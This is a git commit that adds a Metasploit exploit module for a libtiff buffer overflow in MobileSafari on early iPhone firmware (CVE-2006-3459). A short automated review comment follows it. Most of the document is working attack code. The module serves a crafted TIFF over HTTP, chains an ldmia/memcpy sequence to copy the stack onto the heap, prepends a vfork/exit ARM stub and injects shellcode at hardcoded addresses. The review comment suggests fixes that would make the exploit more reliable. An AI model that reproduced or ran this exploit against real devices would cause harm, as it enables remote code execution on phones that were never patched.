First version of the iPhone libtiff exploit

git-svn-id: file:///home/svn/framework3/trunk@5144 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-10-14 22:15:41 +00:00
parent 21d971139b
commit 41088c3ea4
2 changed files with 140 additions and 0 deletions



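--- /dev/null
+++ b/modules/exploits/osx/armle/safari_libtiff.rb
@@ -0,0 +1,140 @@
+##
+# $Id$
+##
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+require 'msf/core'
+module Msf
+class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
+#
+# This module acts as an HTTP server
+#
+include Exploit::Remote::HttpServer::HTML
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'iPhone MobileSafari LibTIFF Buffer Overflow',
+'Description' => %q{
+This module exploits a buffer overflow in the version of
+libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
+1.1.1 of the Apple iPhone. iPhones which have not had the BSD
+tools installed will need to use a special payload.
+},
+'License' => MSF_LICENSE,
+'Author' => ['hdm'],
+'Version' => '$Revision$',
+'References' =>
+[
+['CVE', '2006-3459'],
+['OSVDB', '27723'],
+['BID', '19283']
+],
+'Payload' =>
+{
+'Space' => 300,
+'BadChars' => "",
+# Multi-threaded applications are not allowed to execve() on OS X
+# This stub injects a vfork/exit in front of the payload
+'Prepend' =>
+[
+0xe3a0c042, # vfork
+0xef000080, # sc
+0xe3500000, # cmp r0, #0
+0x1a000001, # bne
+0xe3a0c001, # exit(0)
+0xef000080 # sc
+].pack("V*")
+},
+'Targets' =>
+[
+[ 'MobileSafari iPhone Mac OS X armle (1.00, 1.02)',
+{
+'Platform' => 'osx',
+'Arch' => ARCH_ARMLE,
+'Stack' => 0x0055a5bc,
+'Heap' => 0x0006b400,
+'Memcpy' => 0x3009a1bc,
+}
+],
+],
+'DisclosureDate' => 'Aug 01 2006'
+))
+end
+def on_request_uri(cli, request)
+# Re-generate the payload
+return if ((p = regenerate_payload(cli)) == nil)
+print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+# Transmit the compressed response to the client
+send_response(cli, generate_tiff(p), { 'Content-Type' => 'image/tiff' })
+# Handle the payload
+handler(cli)
+end
+def generate_tiff(code)
+path = File.join(Msf::Config.install_root, "data", "exploits", "iphone_libtiff.bin")
+print_status("Opening file...")
+data = File.read(path, File.size(path))
+print_status("Done...")
+#
+# The basic idea:
+#
+# Overwrite return address with: ldmia sp!, {r0, r1, r2, r3, pc}
+# This loads r0-r3 and pc from the stack, jumping to the address in pc
+# The address in pc is the real address of memcpy(), which takes
+# parameters via the r0-r3 registers. We memcpy the stack address
+# (which seems to be static across all versions) to an unused page
+# on the heap. Finally, we patch up a local variable (r6) and then
+# return back to the heap location we copied the stack to.
+#
+dst_ptr = target['Heap']
+src_ptr = target['Stack']
+shl_len = 168 + payload.encoded.length
+# Still some wonky characters in here, this doesn't work with alpha/english/etc
+patt = pattern_create(shl_len)
+# 300df800 e8bd800f ldmia sp!, {r0, r1, r2, r3, pc}
+patt[120,4] = [0x300df800].pack("V")
+# memcpy(r0, r1, r2)
+patt[140,4] = [target['Memcpy']].pack("V") # memcpy @ 0x3009a1bc
+patt[124,4] = [dst_ptr].pack("V") # dst
+patt[128,4] = [src_ptr].pack("V") # src
+patt[132,4] = [shl_len].pack("V") # len
+# fix up r6 to bypass an exception
+patt[112,4] = [dst_ptr + shl_len].pack("V")
+# Return back to our copied stack data
+patt[164,4] = [dst_ptr + 168].pack("V")
+# Stick our shellcode into the buffer
+patt[168, payload.encoded.length] = payload.encoded
+data << patt
+data
+end
+end
+end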
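Review bot: generate_tiff never reads its `code` parameter; the lines `shl_len = 168 + payload.encoded.length` and `patt[168, payload.encoded.length] = payload.encoded` take the bytes from the module-level `payload` instead of the object that on_request_uri just obtained from regenerate_payload(cli) and passed in. If regenerate_payload does not also refresh `payload` (its implementation is not visible here), the TIFF served to a client is built from stale payload bytes while the handler waits for the freshly generated one. Using the argument consistently, `shl_len = 168 + code.encoded.length` and `patt[168, code.encoded.length] = code.encoded`, removes the ambiguity without changing the layout. Separately, the description claims firmware 1.00, 1.01, 1.02 and 1.1.1 while the only target is labelled `(1.00, 1.02)` and the Stack/Heap/Memcpy addresses are justified solely by the comment that the stack address "seems to be static across all versions"; the target name or description should state which firmware versions the addresses were actually verified against.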